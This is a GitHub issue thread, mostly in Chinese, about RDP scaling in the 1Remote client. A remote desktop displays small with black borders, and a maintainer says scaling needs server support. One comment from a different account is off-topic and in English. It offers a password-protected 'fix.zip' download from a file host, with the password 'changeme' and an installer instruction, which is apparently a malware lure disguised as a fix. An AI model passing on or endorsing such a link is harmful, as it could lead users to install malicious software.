### ISSUE TITLE
RDP 缩放无效

### ISSUE THREAD

**Issue by Catiks** [1Remote/1Remote#703]
**Describe the bug**
我在一个2560*1440的本地电脑远程控制一个1920*1080的远程桌面使用rdp协议，远程桌面很小，有很大的黑边
类似这样
![image](https://github.com/user-attachments/assets/01aca6cd-bbc9-4e95-bc30-794161053476)

目前尝试了各种设置都无效，包括定制缩放都无效

**Desktop:**
 - OS: windows11
 - 1.0.0 beta07

**Comment by Catiks** [comment]
尝试了一下premotem，好像也是一样的

**Comment by Catiks** [comment]
![image](https://github.com/user-attachments/assets/30bbccae-a37e-4c8c-b9b9-1249f7342600)
没有最大化窗口的按钮

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by VShawn** [comment]
缩放功能需要服务端支持，xRDP 我记得是不支持的，FreeRDP 不清楚
